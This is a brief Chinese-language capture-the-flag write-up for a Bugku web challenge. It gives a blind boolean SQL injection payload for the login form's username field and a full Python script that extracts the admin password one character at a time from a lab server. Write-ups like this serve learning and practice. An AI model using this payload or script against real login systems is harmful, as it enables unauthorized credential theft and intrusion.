bugku-web-sql注入

方法和都过滤了（web36）差不多

这次用username=admin'^(ascii(mid((password)from(§1§)))<>ascii('§4§'))#&password=123在bp上爆破，网站一如既往的容易挂

上脚本：

#!-*-coding:utf-8-*-


import requests

url = "http://114.67.246.176:16405/index.php"

password = ""
for i in range(1, 100):
    for j in '0123456789abcdefghijklmnopqrstuvwxyz':

        #print(i);

        payload = "admin'^(ascii(mid((password)from(" + str(i) + ")))<>ascii('" + j + "'))#"
        #print(payload)

        #print(j)
        data = {
        'username': payload,
        'password': '123'
        }
        r = requests.post(url=url, data=data)
        #print(r.content)

        #print(r.text)

        if "<p align='center'>password error!</p>" in r.text:
            password += j
            print(password)
            break
print("密码是"+password)

md5解出来还是bugkuctf，直接拿flag

赏

谢谢你请我吃糖果